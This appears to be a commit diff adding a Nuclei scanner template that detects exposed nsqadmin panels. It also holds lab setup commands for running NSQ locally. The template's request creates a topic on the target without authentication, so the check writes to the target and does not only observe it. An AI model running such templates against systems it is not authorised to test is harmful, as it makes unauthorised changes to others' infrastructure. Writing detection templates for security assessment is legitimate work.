1+ id : 51pwn_nsqd_admin
2+ info :
3+ name : 51pwn_nsqd_admin
4+ severity : high
5+ author :
6+ - 51pwn
7+ description : |-
8+ default nsqd admin
9+ pkill -9 nsqlookupd nsqd nsqadmin
10+ ./nsqlookupd &
11+ ./nsqd --lookupd-tcp-address=127.0.0.1:4160 &
12+ ./nsqadmin --lookupd-http-address=127.0.0.1:4161 --http-address=0.0.0.0:8761 &
13+ http://192.168.1.172:8761/lookup
14+
15+ pkill -9 nsqlookupd nsqd nsqadmin
16+ /usr/bin/curl -d 'hello world 1' -XPOST 'http://127.0.0.1:4151/pub?topic=hello%20word'
17+ /usr/bin/curl -XPOST 'http://127.0.0.1:4151/api/topic/create?topic=_51pwn&channel=_51pwn'
18+ nuclei -duc -t config/51pwn/nsqd.yaml -u http://127.0.0.1:8761
19+ requests :
20+ # - raw:
21+ # - |
22+ # GET {{path1}} HTTP/1.1
23+ # Host: {{Hostname}}
24+
25+ # payloads:
26+ # path1:
27+ # - "/"
28+ # - "/lookup"
29+ # attack: clusterbomb
30+ # stop-at-first-match: true
31+ # matchers:
32+ # - type: word
33+ # part: body
34+ # words:
35+ # - '<title>nsqadmin</title>'
36+ # - "var USER_AGENT = 'nsqadmin/"
37+ # - 'var NSQLOOKUPD = ["'
38+ # condition: and
39+ - raw :
40+ - |
41+ POST /api/topics HTTP/1.1
42+ Host: {{Hostname}}
43+ Content-Length: 29
44+ Accept: application/vnd.nsq; version=1.0
45+ X-UserAgent: nsqadmin/v1.2.1
46+ DNT: 1
47+ X-Requested-With: XMLHttpRequest
48+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
49+ Content-Type: application/json
50+ Origin: http://{{Hostname}}
51+ Referer: http://{{Hostname}}/lookup
52+ Accept-Encoding: gzip, deflate
53+ Accept-Language: en-US,en;q=0.9
54+ Connection: close
55+
56+ {"topic":"xx","channel":"xx"}
57+
58+ stop-at-first-match : true
59+ matchers-condition : and
60+ matchers :
61+ - type : status
62+ status :
63+ - 200
64+ - type : word
65+ part : body
66+ words :
67+ - ' "message":""'
68+ - ' {'
69+ - ' }'
70+ condition : and
71+
72+ redirects : false
73+
0 commit comments